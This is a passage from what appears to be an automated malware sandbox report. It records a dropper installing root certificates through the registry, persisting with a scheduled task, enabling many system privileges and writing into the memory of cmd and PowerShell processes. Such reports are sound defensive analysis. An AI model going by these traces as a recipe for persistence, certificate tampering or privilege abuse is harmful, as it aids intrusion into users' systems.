19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
